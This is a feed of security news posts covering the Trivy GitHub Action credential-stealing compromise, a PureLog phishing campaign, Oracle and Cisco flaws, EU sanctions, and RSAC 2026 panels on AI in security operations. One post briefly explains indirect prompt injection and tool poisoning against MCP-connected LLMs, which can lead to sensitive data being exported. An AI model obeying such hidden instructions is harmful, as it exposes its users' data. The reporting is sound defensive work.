The most pressing development for DevOps and security engineering teams involves a multi-stage software supply chain event impacting the open-source Trivy ecosystem. Over the past 24 hours, details emerged regarding an unauthorized party who compromised Trivy’s GitHub Action components to collect sensitive CI/CD secrets. The sequence, beginning with token theft in early March, escalated on March 19 when the actor force-pushed unauthorized code to nearly every released version of `trivy-action`, bypassing the trust model commonly associated with version tags. Because many automated pipelines rely on mutable tags like "v1" rather than immutable commit SHAs, these environments unknowingly pulled and executed unauthorized code designed to collect cloud credentials, SSH keys, and Kubernetes tokens.

The technical mechanics of this incident require careful attention from defensive teams. A malicious actor used a compromised automated service account, `aqua-bot`, to publish modified Docker images (v0.69.5 and v0.69.6) and manipulated GitHub Action tags to introduce a credential-collection script. This script scans more than 50 filesystem locations for credentials across AWS, Azure, and Google Cloud, alongside database keys and cryptocurrency wallets. If the script cannot transmit data to its primary external infrastructure, it uses a secondary method: attempting to create a public repository named `tpcp-docs` within the affected organization's own GitHub environment to host the data. This technique shows a shift toward using an organization's trusted environment to stage sensitive information.

While the Trivy event affects supply chains, a localized phishing campaign is currently testing endpoint defenses across the government, healthcare, and hospitality sectors. Unauthorized parties are distributing the PureLog infostealer using deceptive copyright infringement notices customized to the recipient's local language. Observed affecting organizations in Canada, Germany, the US, and Australia, this campaign uses a multi-stage, fileless execution process to avoid detection. After a user opens what appears to be a PDF, a Python-based loader performs environment checks for sandboxes before transferring execution to two successive .NET loaders. These components eventually launch PureLog directly into memory, utilizing AMSI bypass techniques and heavy code obfuscation to evade traditional antivirus and forensic analysis.

Alongside these active developments, enterprise leaders at RSAC 2026 shared outcomes from six-month AI trials, offering a framework for safer automation. Security teams in the manufacturing and financial sectors reported that integrating Large Language Models (LLMs) into the SOC improved the mean time to discovery (MTD) by up to 36% and reduced analyst fatigue through automated context-gathering and documentation. However, these efficiency gains carry caveats: fully autonomous AI remains unreliable for high-stakes decisions. During one trial within a financial SOC, an autonomous model struggled with ambiguous data signals and incorrectly removed authorized users from the network.

The consensus among these leaders points toward a "human on the loop" model for scaled operations. Vodafone, for example, utilizes an "AI Booster" platform to centralize machine learning models, enabling privacy and security teams to enforce consistent guardrails. For defensive teams, the guidance is specific: AI should operate in a read-only capacity for triage and summarization, requiring strict human approval gates for any action that impacts system access or production equipment. In manufacturing environments, this requires ensuring AI cannot interact directly with PLCs or SCADA systems, preventing automated errors from causing physical safety events.

For teams responding to these developments, conducting a thorough audit of the software supply chain is a priority. We advise any organization that utilized `trivy-action` or `setup-trivy` between March 19 and March 23 to operate under the assumption that their CI/CD secrets are exposed. The immediate rotation of all accessible credentials, including cloud provider keys and SSH tokens, is the primary path to remediation. To prevent similar recurrences, we recommend reconfiguring pipelines to pin GitHub Actions to full, 40-character commit SHAs instead of version tags. SHAs are immutable and prevent unauthorized code from being force-pushed to an existing label.
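
The tag-pinning recommendation can itself be audited automatically. The sketch below is illustrative; the regexes are simplified and the workflow text is a made-up example. It flags any `uses:` reference in a workflow that is not pinned to a full 40-character commit SHA:

```python
import re

# A 'uses:' reference counts as pinned only if it ends in a 40-hex commit SHA.
USES = re.compile(r"uses:\s*([\w.-]+/[\w.-]+)@([\w.-]+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_yaml: str) -> list[str]:
    """Return action references in a workflow that rely on mutable tags."""
    bad = []
    for m in USES.finditer(workflow_yaml):
        action, ref = m.groups()
        if not FULL_SHA.match(ref):
            bad.append(f"{action}@{ref}")
    return bad


# Hypothetical workflow fragment for illustration.
example = """
steps:
  - uses: aquasecurity/trivy-action@v1
  - uses: actions/checkout@8f4b7f84864484a7bf31766abe9204da3cbe65b3
"""
# unpinned_actions(example) flags only the mutable 'v1' reference
```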

Regarding the PureLog campaign, defensive efforts should prioritize behavioral detection over static signatures. Monitoring for the suspicious use of legitimate tools, such as WinRAR for component extraction, and restricting unauthorized Python execution on endpoints can disrupt the initial stages of the infection sequence. Security teams should also tune EDR and XDR platforms for memory scanning to detect the fileless transition involving the .NET loaders and the final PureLog execution.

The relationship between security tools and the environments they protect requires careful management. The transition toward "agent-assisted" defense, discussed by leaders from Google and PayPal, acknowledges that manual processes struggle to match automated event volumes. However, this shift necessitates a "zero trust" approach to security tools themselves. Evaluating an AI model or a vulnerability scanner with the same scrutiny applied to a third-party vendor is now a foundational requirement for maintaining integrity in automated enterprises.

The full extent of data transferred during the Trivy exposure window remains under investigation. While the presence of a "tpcp-docs" repository serves as a clear indicator of compromise, more stealthy data transfer may have occurred before the fallback mechanism activated. We advise security teams to continuously monitor cloud environment logs for unusual API calls or credential usage originating from CI/CD service accounts over the coming weeks.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Threat actors conceal PureLog infostealer in copyright infringement notices</title>
        <link>https://security.shortwaves.live/blog/fbd65e65-0179-44e5-b3de-4f515255bce6</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/fbd65e65-0179-44e5-b3de-4f515255bce6</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:46 GMT</pubDate>
        <description>A targeted phishing campaign is using localized copyright infringement notices to distribute the PureLog infostealer. By employing a multi-stage, fileless execution process, threat actors aim to bypass traditional defenses and access sensitive data in critical sectors.</description>
        <content:encoded><![CDATA[
            Threat actors are using copyright-infringement notices to target multiple industry sectors in a fileless phishing campaign that distributes information-stealing malware.

The campaign, aimed at organizations in critical sectors including healthcare, government, hospitality, and education, attempts to install PureLog Stealer, a low-cost infostealer considered easy for unauthorized parties to operate, according to a report by Trend Micro.

Primarily, the operation has targeted healthcare and government organizations in Germany and Canada. Trend Micro threat researchers Mohamed Fahmy, Allixon Kristoffer Francisco, and Jonna Santos noted that this indicates selective targeting and a structured, evasive delivery framework rather than simple mass malware distribution. Organizations in the US and Australia were also targeted.

For initial access, threat actors rely on phishing emails that create a sense of urgency to deceive recipients into downloading a malicious executable tailored to the recipient's local language. This targeted delivery increases the apparent authenticity of the message and the likelihood of execution.

Recipients of the emails often believe they are reviewing a legal notice informing them of copyright violations. Instead, users manually execute what appears to be a PDF file. This initiates the execution of PureLog via a multistage, in-memory process that relies on multiple loaders and features a series of evasive maneuvers, including a bypass for Windows Defender's Antimalware Scan Interface (AMSI), anti-virtual machine techniques, and heavy code obfuscation.

The researchers note that the campaign uses a combination of social engineering, staged malware delivery, and in-memory execution to evade both detection and forensic analysis.

## Phishing sequence designed for evasion

The intrusion sequence is designed from start to finish with a focus on evading detection by users and security teams. Opening the attachment or clicking on the link leads to a compressed archive containing what looks like a benign document, typically a PDF file. The archive also contains supporting files required for execution and a renamed legitimate tool, such as WinRAR, which is used to extract and launch components.

The execution flow features a two-stage loader process. The first loader, which is Python-based, initiates the sequence with an environmental check to detect sandbox or virtual machine environments. Further decryption of the malicious components then occurs through two successive .NET loaders. According to Trend Micro, these loaders obfuscate the execution flow and delay full exposure to the malware.

The Python-based loader and dual .NET loaders introduce redundancy and fileless execution pathways, ensuring that the final PureLog Stealer component launches reliably without leaving standard artifacts on the disk.

## PureLog as the final component

As a further evasion tactic, the malware retrieves decryption keys from a remote server at runtime. This ensures that the components remain encrypted while not in execution mode, preventing security analysts from extracting the final malware without live execution.

This mechanism sets up the final deployment of the PureLog executable. It runs directly in memory, leaving scarcely any artifact trail and bypassing many traditional defenses. Throughout the entire process, the malware uses AMSI bypass techniques, heavy code obfuscation, and anti-analysis checks to maintain stealth.

Once activated, the PureLog infostealer establishes persistence via registry modifications, captures screenshots, profiles the system, and harvests sensitive data. This includes Chrome browser credentials, browser extensions, cryptocurrency wallets, and system information.

Given its stealthy execution and layered delivery, successful compromise of a targeted system can result in credential theft, account takeover, and downstream unauthorized activity.

## Defending against evasive phishing

With phishing campaigns growing more complex through targeted social engineering and sophisticated evasion tactics, and amid a heightened geopolitical environment, it is critical for organizations to remain highly vigilant.

The evasion and obfuscation measures of the PureLog campaign, along with the in-memory execution of the malware, demonstrate the necessity of behavioral detection, network telemetry, and proactive threat hunting. This activity reflects a shift away from broad, opportunistic malware distribution toward more selective targeting across multiple countries.

To protect their environments, organizations can configure email filters to flag or sandbox messages containing legal threats and unexpected attachments. Security awareness training should also help users recognize unexpected legal or financial claims in their inboxes as high-risk items.

Further down the intrusion sequence, defenders can restrict script and loader execution by disabling or tightly controlling unauthorized Python execution on endpoints. Teams can utilize application allowlisting to approve only specific scripts or binaries and monitor for the suspicious use of legitimate tools. Finally, to detect the campaign's in-memory execution and fileless activity, organizations should deploy EDR and XDR solutions configured with memory scanning and behavioral detection capabilities.

*(Originally reported by Elizabeth Montalbano)*
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>CISOs Evaluate the Human Role in AI-Powered Security at RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/afcb3a85-b614-4245-83f7-0cc6689bb73a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/afcb3a85-b614-4245-83f7-0cc6689bb73a</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:46 GMT</pubDate>
        <description>Security leaders from Google Cloud, Vodafone, and PayPal outline methodologies for integrating AI safely, evaluating the balance between automated defenses, scalable guardrails, and necessary human oversight.</description>
        <content:encoded><![CDATA[
            At the RSAC 2026 Conference in San Francisco, a central question emerged regarding enterprise artificial intelligence deployments: do these systems require a "human in the loop," or does manual oversight limit operational speed and scalability?

During a panel titled "Threat and Strategy: The CISO's Playbook for the AI Revolution," security executives examined evolving AI use cases and the requirements for safe, protective deployment. Moderated by James Rundle of The Wall Street Journal, the discussion featured Francis deSouza, Google Cloud chief operating officer and president of security products; Emma Smith, Vodafone global CISO; and Shaun Khalfan, PayPal senior VP and CISO.

The integration of LLM-powered security tools has shifted the broader security environment. Securing AI systems requires strict standards to prevent the exposure of sensitive corporate data through vulnerabilities such as prompt injections. The shared data security model between AI vendors and customers remains operationally complex. Additionally, engineering practices like relying heavily on AI-generated code without adequate human review can introduce new structural risks, adding complexity to the CISO's mandate. Industry studies indicate that many organizations are still working to mature their AI security and governance deployments.

The panelists shared their current operational baselines. Google reports that 50% of its code is currently AI-generated with developer assistance. Vodafone security analysts use AI systems to automate workflows and generate executive summaries of technical data. Khalfan noted that PayPal utilizes AI to support fraud detection across its one billion monthly transactions.

Smith detailed Vodafone's realization that adopting AI safely requires a top-down approach from leadership to ensure ethical and responsible integration. Vodafone's architectural solution is AI Booster, a centralized machine learning platform built on Google's Vertex AI. It features a central, reusable codebase that allows the organization to deploy established use cases quickly via pre-trained models and custom tools. This centralization gives Vodafone's privacy engineering team a consistent framework to review each use case, track business value, and verify that proper guardrails are in place.

## Evaluating the human operational role

The panel evaluated the "human in the loop" model—the practice of requiring human validation for LLM outputs at specific steps. deSouza noted that manual defense processes are often too slow to mitigate automated, agent-driven security threats. Because of this velocity mismatch, Google is moving toward agent-assisted defense architectures.

Smith agreed that relying strictly on human review is difficult to sustain for scaled operations.

"I totally agree that a human in the loop is not scalable if we think about our traditional security controls," Smith said. "Let's face it, we rely on the ones that are technical and automated and that we can prove over time. A human in the loop is not the solution for the long term, certainly on scaled operations."

Instead, organizations can position personnel "on the loop" to review insights and guide AI systems asynchronously. Smith noted that Vodafone utilizes a heat map to evaluate the confidence and potential risk impact of AI outcomes. For use cases with a high risk impact, the organization strictly enforces a human-in-the-loop requirement unless an overriding business benefit justifies an alternative, highly monitored approach.
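
The heat-map routing Smith describes can be expressed as a simple decision function. The sketch below is a hypothetical illustration (the thresholds and tier names are invented, not Vodafone's): high-impact actions always gate on a human, regardless of model confidence:

```python
from enum import Enum


class Disposition(Enum):
    AUTO_EXECUTE = "auto-execute"
    HUMAN_ON_LOOP = "human reviews asynchronously"
    HUMAN_IN_LOOP = "human must approve first"


def route(confidence: float, risk_impact: str) -> Disposition:
    """Illustrative heat-map routing for AI-suggested security actions.

    High-impact actions always require prior human approval; only
    high-confidence, low-impact actions run automatically.
    """
    if risk_impact == "high":
        return Disposition.HUMAN_IN_LOOP
    if confidence >= 0.9 and risk_impact == "low":
        return Disposition.AUTO_EXECUTE
    return Disposition.HUMAN_ON_LOOP
```

Note that `route(0.95, "high")` still returns `HUMAN_IN_LOOP`: under this policy, no level of model confidence lets a business-critical action bypass human approval.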

## Structuring data security and industry collaboration

Khalfan emphasized the necessity of encasing AI initiatives within a comprehensive compliance and risk framework. While PayPal utilizes the engineering benefits of AI tooling, he stated that the surrounding data security wrapper is equally critical.

"When we think about our key AI principles, it's data and security. It's privacy, it's transparency, it's explainability," Khalfan said. "As we wrap everything we're doing in these principles, it helps us keep this anchor of all of the efforts that we're making."

To operationalize this, PayPal's AI teams categorize models in tiers based on data sensitivity. This classification determines the specific controls required to protect stored data from tampering and unauthorized inputs, including prompt injections. It also guides how the organization manages the multiple identities required by AI agents.

Khalfan also pointed to the value of broader ecosystem collaboration, specifically referencing the Coalition for Secure AI (CoSAI). This industry-wide initiative provides documentation, white papers, and standardized methodologies to support secure AI development across different workstreams.

Alexandra Rose, director of government partnerships and the Counter Threat Unit at Sophos, summarized the objective of safe AI deployment as a balance of innovation and protection.

"I think it's important that security is not the world of no," she said. "It's how do we get to yes, and how do we get to a yes in a way that we're protected?"
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Security incident involving open-source Trivy components and CI/CD environments</title>
        <link>https://security.shortwaves.live/blog/5d730f47-8420-4268-a90e-1b093933bf5d</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/5d730f47-8420-4268-a90e-1b093933bf5d</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:45 GMT</pubDate>
        <description>An unauthorized party compromised specific open-source components of the Trivy security scanner, modifying existing GitHub Action tags to collect sensitive CI/CD secrets. Organizations using affected Trivy components during the exposure window should immediately audit their pipelines and rotate accessible credentials.</description>
        <content:encoded><![CDATA[
            A recent software supply chain security incident involving the open-source Trivy security scanner resulted in unauthorized modifications designed to collect sensitive secrets from automated enterprise software build and deployment pipelines. The unauthorized party targeted cloud credentials, SSH keys, authentication tokens, and other sensitive data.

Trivy is an open-source scanner widely used to identify vulnerabilities in container images, code repositories, and infrastructure configurations. Because many organizations integrate Trivy deeply into their continuous integration and continuous delivery (CI/CD) pipelines, the tool operates with elevated privileges. Aqua Security, the primary maintainer of Trivy, offers a separate commercial version of the scanner, which the company states does not appear to have been impacted by this incident.

## Multistage software supply chain incident

The security incident began in February when a misconfiguration in Trivy’s GitHub Action component allowed an unauthorized party to obtain a privileged access token. This token provided access to Trivy's repository automation and release environment.

The Trivy team discovered the initial unauthorized access and disclosed it on March 1. The team executed a credential rotation; however, the threat actor managed to retain access to the environment and capture newly rotated secrets.

On March 19, the threat actor used those credentials to force-push unauthorized code to 76 of the 77 previously released versions of `trivy-action`, the GitHub Action that organizations use to run Trivy scans inside their automated CI/CD pipelines. A CI/CD pipeline referencing any of those mutable version tags would have downloaded and executed the compromised code instead of the legitimate original.

The unauthorized party also altered all seven versions in the `setup-trivy` repository. Additionally, the threat actor used a compromised automated service account, `aqua-bot`, to publish a compromised version of Trivy, v0.69.4, and manipulate its GitHub Action tags.

In a March 22 security update, Aqua Security noted that the threat actor modified existing version tags associated with `trivy-action` to introduce unauthorized code into workflows that organizations were already running. Because many automated CI/CD pipelines rely entirely on version labels without verifying code integrity through commit hashes, the pipelines continued running without detecting the modifications.

In a subsequent update on March 23, Aqua disclosed that the threat actor used the compromised automated service account to publish two compromised Docker images, v0.69.5 and v0.69.6, distributing the unauthorized code through Trivy's trusted release channels.

## Credential harvesting mechanism

The Trivy security team and Aqua Security analyzed the unauthorized code, describing it as a credential-harvesting mechanism. It scans over 50 filesystem locations for SSH keys; cloud provider credentials for AWS, Google Cloud, and Azure; Kubernetes authentication tokens; Docker configuration files; environment variable files; database credentials; and cryptocurrency wallets.

The analysis shows the script uses AES-256-CBC with RSA-4096 hybrid encryption to secure and transmit collected data to external infrastructure controlled by the threat actor. If external transmission fails, the code initiates a fallback mechanism: it creates a public GitHub repository named `tpcp-docs` on the affected organization's account and uploads the collected data there.

According to Aqua Security, this combination of credential compromise, abuse of trusted release channels, and silent execution within CI/CD pipelines illustrates the mechanics of a modern software supply chain incident.

This incident reflects a broader pattern of threat actors focusing on trusted security tools and vendors. Earlier this month, Outpost24 reported an incident involving a sophisticated seven-stage phishing chain aimed at obtaining credentials from a C-level executive. While that specific attempt was unsuccessful, these events demonstrate ongoing efforts to compromise security products that organizations rely on and that hold extensive access to their environments.

## Recommended remediation steps

Organizations that used any affected version of Trivy, `trivy-action`, or `setup-trivy` during the exposure windows must treat all secrets accessible to those pipelines as compromised and rotate them immediately. Based on guidance from Aqua Security and the Trivy maintainers, we recommend the following actions:

* Audit Trivy versions: Review systems to determine if they pulled or executed the compromised Trivy v0.69.4, v0.69.5, or v0.69.6 versions from any source, and remove them immediately.

* Update to known-safe versions: Ensure all workflows are running verified safe versions, such as Trivy binary v0.69.2 or v0.69.3, `trivy-action` v0.35.0, and `setup-trivy` v0.2.6.

* Review GitHub Action references: Check all workflows using `aquasecurity/trivy-action` or `aquasecurity/setup-trivy` for signs of compromise, specifically reviewing run logs from March 19 and 20.

* Search for exfiltration artifacts: Inspect GitHub organizations for the presence of a repository named `tpcp-docs`, which indicates the fallback exfiltration mechanism was triggered.

* Pin GitHub Actions to full SHA hashes: To prevent exposure to mutable tag modifications in the future, organizations should configure CI/CD pipelines to pin GitHub Actions to full, immutable commit SHA hashes rather than version tags.
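
The pinning recommendation can be checked mechanically. The following sketch (the regex and repository layout are assumptions, not part of the vendor guidance) flags any `uses:` reference in a workflow that is not pinned to a full 40-character commit SHA:

```python
import re
from pathlib import Path

# A `uses:` reference is treated as pinned only when it points at a full
# 40-character commit SHA; tags like @v0.33.0 or @master are mutable.
USES_RE = re.compile(r"uses:\s*([\w.-]+/[\w.-]+)@([\w.-]+)")
SHA_RE = re.compile(r"[0-9a-f]{40}")

def unpinned_actions(workflow_text):
    """Return (action, ref) pairs whose ref is not an immutable commit SHA."""
    return [
        (action, ref)
        for action, ref in USES_RE.findall(workflow_text)
        if not SHA_RE.fullmatch(ref)
    ]

def scan_workflows(repo_root="."):
    """Scan .github/workflows for mutable action references."""
    findings = {}
    for path in Path(repo_root, ".github", "workflows").glob("*.y*ml"):
        hits = unpinned_actions(path.read_text())
        if hits:
            findings[str(path)] = hits
    return findings
```

Running such a scan across an organization's repositories turns the pinning policy into an auditable control rather than a one-time cleanup.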
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating AI in the SOC: Operational Metrics and Governance from RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/5c644040-88ec-495d-8815-fd5ca066803f</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/5c644040-88ec-495d-8815-fd5ca066803f</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:45 GMT</pubDate>
        <description>Enterprise security leaders from the financial and manufacturing sectors shared results from a six-month trial integrating AI into their Security Operations Centers. The findings demonstrate that while large language models effectively reduce analyst fatigue and time-to-discovery, safe deployment requires strict read-only architectures and human-in-the-loop governance.</description>
        <content:encoded><![CDATA[
            At the RSAC 2026 Conference in San Francisco, enterprise security leaders addressed the operational pressure to integrate artificial intelligence into security operations centers (SOCs). To determine where AI provides measurable value and where it introduces unmanaged risk, Shilpi Mittal, who oversees security for a Fortune 500 food manufacturing company, and Ankit Gupta, who protects a financial institution, conducted structured six-month trials. They shared their findings during the session, "We Put AI in Our SOC — Here’s What Worked and What Didn't."

Both environments require rigorous safeguarding against security incidents, though their specific operational constraints differ. To test the technology responsibly, Mittal and Gupta established defined pilot programs to measure performance, fatigue reduction, and system reliability.

## Deploying AI in a manufacturing environment

Mittal’s team deployed a large language model (LLM) as a read-only triage assistant within their case workflow. The tool evaluated telemetry from endpoint detection and response (EDR), cloud systems, applications, and operational technology (OT) monitoring feeds.

The pilot yielded quantifiable improvements in standard operational metrics. Based on initial results, mean time to discovery (MTD) improved by 26% to 36%, mean time to response (MTTR) improved by 22%, and false positives dropped by 16 points.

Because operational downtime in manufacturing directly impacts production lines and worker safety, the team established strict system boundaries. AI was prohibited from directly interacting with programmable logic controllers (PLCs), SCADA systems, or any production equipment. The security team also enforced human approval gates, strict tool allow lists, mandatory citations for AI outputs, and comprehensive audit logging.
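
The guardrails described above, tool allow lists, human approval gates, and audit logging, can be sketched as a thin policy wrapper around tool execution. This is a minimal illustration of the pattern; all action names here are hypothetical, not part of the deployment Mittal described.

```python
# Illustrative guardrail wrapper: every AI-proposed action must be on an
# allow list, and sensitive actions additionally require human approval.
ALLOW_LIST = {"quarantine_file", "open_ticket", "enrich_alert"}
REQUIRES_APPROVAL = {"quarantine_file"}

audit_log = []  # every decision is recorded, approved or not

def execute_ai_action(action, target, approver=None):
    """Run an AI-proposed action only if policy allows it; log everything."""
    if action not in ALLOW_LIST:
        audit_log.append(("denied", action, target))
        return "denied: not on allow list"
    if action in REQUIRES_APPROVAL and approver is None:
        audit_log.append(("pending", action, target))
        return "pending: human approval required"
    audit_log.append(("executed", action, target, approver))
    return "executed"
```

The key design choice is that the model never calls tools directly; it only proposes actions that pass through a deterministic policy layer the security team controls.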

In one approved automated response scenario, the system identified a suspicious `.git` file on an endpoint. The AI categorized the file as unauthorized code, quarantined it, and suspended the associated software to prevent execution. While this demonstrated capable proactive prevention, Mittal noted the AI also generated new types of false positive alerts for the team to process. Scaling these tools across sprawling OT and legacy environments will require continuous tuning.

## Testing autonomous control in a financial SOC

Gupta’s financial organization operates under strict state-level regulatory oversight, including privacy mandates from California and Texas, meaning any automated action carries significant compliance weight. His team found AI highly effective for structured tasks like fraud detection, algorithmic trading, automated underwriting, and updating deterministic playbooks.

However, when applied directly to SOC workflows, fully autonomous AI proved unreliable. During a two-week test in a non-production environment where the AI was granted full control over alert management, the model struggled to process the reality of SOC data. Encountering incomplete fields, inconsistent identifiers, and ambiguous signals, the system incorrectly removed authorized users from the network.

Consequently, Gupta concluded that while AI excels at summarizing complex data, correlating context, and structuring narratives from multiple security tools, final decisions must remain with human analysts. By shifting documentation and context-gathering tasks to the LLM, the organization saved analysts 10 to 15 hours per week, measurably reducing fatigue and context switching.

## Governance and paths forward

The trials offer a practical framework for organizations facing executive pressure to adopt AI technologies. Integrating AI successfully requires a risk-based approach that prioritizes problem clarity, strict access management, and human-in-the-loop validation for high-impact decisions.

Security teams evaluating AI should establish the following controls:
* Data and access management: Build controls to minimize data exposure and create strict identity protocols for AI tools and APIs.

* Transparency: Require explainable outputs for any decisions that impact access or compliance.

* Continuous validation: Actively test systems for unauthorized inputs and treat AI models like any other critical security control by routinely auditing their results.

As organizations adapt to new capabilities, security teams must stay actively engaged in the deployment process to support innovation safely. Summing up the relationship between security initiatives and organizational goals, Mittal advised: "Business drives security. Security doesn't drive the business."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Securing the Execution Layer: Remediation Strategies for Emerging Edge and Identity Vulnerabilities</title>
        <link>https://security.shortwaves.live/blog/91fe8aef-f29a-4d3e-bf7b-386f27b9c26a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/91fe8aef-f29a-4d3e-bf7b-386f27b9c26a</guid>
        <pubDate>Sat, 21 Mar 2026 03:17:49 GMT</pubDate>
        <description>Recent advisories for Oracle and Cisco infrastructure, alongside evolving ransomware methodologies, require immediate attention from enterprise security teams. This briefing outlines the technical mechanisms of these vulnerabilities and provides actionable mitigation strategies to protect identity management systems and edge devices.</description>
        <content:encoded><![CDATA[
            In the last 24 hours, the defensive environment has shifted significantly as critical vulnerabilities in enterprise edge and identity infrastructure take priority for security teams. Organizations are facing a dual challenge: addressing high-severity advisories from major vendors like Oracle and Cisco while simultaneously navigating a concurrent rise in ransomware activity that utilizes both zero-day vulnerabilities and common administrative tools. These developments show a persistent trend where sophisticated threat actors, including the Interlock and Beast ransomware groups, effectively navigate the gap between a vulnerability’s disclosure and its eventual remediation in complex enterprise networks.

For many organizations, the most urgent priority is Oracle’s rare out-of-band security alert for CVE-2026-21992. Carrying a nearly maximum CVSS score of 9.8, this vulnerability affects Oracle Fusion Middleware, specifically the Identity Manager (OIM) and Web Services Manager (OWSM). The flaw resides in the HTTP API surface and allows unauthenticated remote code execution (RCE). Oracle’s decision to release this update outside of its standard quarterly cycle is a significant indicator of risk; such alerts have occurred only about 30 times in the last 15 years. This vulnerability allows an unauthorized party to manipulate identities, roles, and policies, providing a direct path for lateral movement and privilege escalation within production environments.

This Oracle advisory mirrors a similar critical situation with Cisco’s Secure Firewall Management Center (FMC). Recent analysis from Amazon Web Services (AWS) reveals that the Interlock ransomware group began leveraging CVE-2026-20131 (CVSS 10.0) as early as January 26, well before Cisco’s public disclosure on March 4. This vulnerability involves insecure deserialization of Java byte streams, allowing unauthenticated parties to execute arbitrary code as root. The Interlock group combined this vulnerability with a sophisticated multi-stage sequence, using custom remote-access Trojans (RATs) and automated PowerShell scripts to map Windows environments. By the time many organizations received the notification to patch, threat actors had already established persistent command-and-control (C2) through redundant JavaScript and Java-based backdoors.

Beyond these high-profile incidents, the operational mechanics of ransomware groups are becoming clearer through recent server exposures. Security researchers recently analyzed a server belonging to the Beast ransomware group, an evolution of the Monster family. The findings detail a heavy reliance on "dual-use" software: legitimate applications such as AnyDesk for remote management and Mega for data exfiltration. Beast’s methodology specifically targets structural recovery; the group utilizes scripts like `disable_backup.bat` to halt the Volume Shadow Copy Service (VSS) and delete snapshots before deploying their encryptor. While the broader ransomware field saw encryption rates drop to 50% in the last year, the sophistication of these groups in disrupting isolated backups and wiping system logs with utilities like `CleanExit.exe` remains a primary concern for incident responders.

Technically, these threats represent an intersection of identity manipulation and edge-device compromise. In the case of the Oracle vulnerability, the low complexity of the methodology means that an unauthorized party could degrade network defenses by modifying OWSM security policies without ever needing valid credentials. Meanwhile, the Interlock campaign demonstrates the danger of edge devices as pivot points. Because firewalls are inherently internet-facing and often lack deep internal telemetry, they provide an ideal staging ground for threat actors to move laterally. The Interlock group even deployed disposable relay networks built with BASH scripts to obscure their origins, complicating attribution and detection efforts.

This shift toward autonomous execution and unauthorized instruction is also beginning to manifest in the AI space. As organizations adopt the Model Context Protocol (MCP) to connect large language models (LLMs) to enterprise data, they are introducing architectural risks that traditional patching cannot fix. In an MCP-enabled environment, the LLM transitions from a text generator to an execution engine that can autonomously trigger workflows or access local files. This creates exposure to "indirect prompt injection," where hidden instructions in a retrieved email or document can direct the LLM to export sensitive data. Furthermore, "tool poisoning" allows unauthorized users to manipulate the metadata an LLM uses to understand its capabilities, effectively turning the AI agent against the host environment.

To protect production environments, the immediate priority is clear: verify and patch Cisco FMC and Oracle Fusion Middleware installations immediately. Given that Interlock was leveraging the Cisco flaw weeks before disclosure, security teams should also review logs for indicators of compromise (IoCs) provided by AWS and Cisco, specifically looking for unusual Java execution or root-level activity on firewall management interfaces. To counter the dual-use tool tactics seen in the Beast ransomware analysis, organizations should implement strict application allow-listing and EDR policies that block unauthorized remote management software by default.

Looking ahead, the European Council’s recent sanctions against technology firms in China and Iran serve as a reminder of the geopolitical weight behind these cyber operations. By sanctioning groups like iSoon and Integrity Technology Group, the latter linked to unauthorized access across 65,000 devices in Europe, regulatory bodies are attempting to squeeze the commercial infrastructure that supports state-sponsored intrusions. However, as these groups continue to operate through private-sector fronts and utilize zero-day vulnerabilities in critical infrastructure, the burden remains on enterprise security teams to maintain defense-in-depth strategies.

While the current patches address the most immediate RCE threats, the broader challenge of securing the "execution layer", whether in firewalls, identity managers, or emerging AI protocols, remains an ongoing focus. It is currently unknown if CVE-2026-21992 is being actively targeted in production environments like its Cisco counterpart, but the historical precedent for similar Oracle vulnerabilities suggests that unauthorized access attempts will likely materialize quickly.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>EU implements sanctions against technology firms in China and Iran for malicious cyber activities</title>
        <link>https://security.shortwaves.live/blog/7c3ed62b-ac78-413d-b70c-2ea191dd6290</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/7c3ed62b-ac78-413d-b70c-2ea191dd6290</guid>
        <pubDate>Sat, 21 Mar 2026 03:17:49 GMT</pubDate>
        <description>The European Council has applied restrictive measures to three organizations and two individuals for their roles in unauthorized access campaigns against European infrastructure. The action reflects a structured regulatory response to state-sponsored operations and supply chain risks.</description>
        <content:encoded><![CDATA[
            The European Council has imposed sanctions on three ostensibly private companies, two based in China and one in Iran, for facilitating and executing unauthorized access operations against organizations in European countries.

One of the organizations, Integrity Technology Group, is a mid-size publicly traded corporation in China. Investigations showed the company supplied tools that threat actors used to compromise systems globally. The European Council linked the firm's software to 65,000 compromised devices across six European Union (EU) countries between 2022 and 2023.

The Council also sanctioned Anxun Information Technology, widely known as iSoon. While presenting itself as a cybersecurity training company, iSoon operates as a contract-based intrusion group supporting China's government and military. The EU also sanctioned the company's two founders as individuals.

The Iranian company, Emennet Pasargad, faces sanctions for gaining unauthorized access to a Swedish SMS service, exposing data from a French organization, and distributing disinformation via advertising billboards during the 2024 Paris Olympic Games.

These three organizations were previously sanctioned by the US and UK governments. Under the new European restrictions, they are prohibited from conducting business within the EU, their regional assets are frozen, and the two sanctioned individuals face travel bans across EU member states.

## Why nations leverage private sector entities

State-level operations frequently rely on private sector companies for support. Adam Meyers, head of counter adversary operations at CrowdStrike, notes that this operational model is common across several nations. Corporations provide military units with necessary technical capabilities, infrastructure development, and planning resources.

In China, the People's Liberation Army (PLA) has maintained close connections with the private sector and academia since the 1990s. Iran followed a different trajectory. Following the discovery of the Stuxnet malware, Iranian operators began shifting from informal networks to professional corporate structures. These newly formed companies provided training and met the demand for technical capabilities at the Ministry of Intelligence and Security (MOIS) and the Islamic Revolutionary Guard Corps (IRGC).

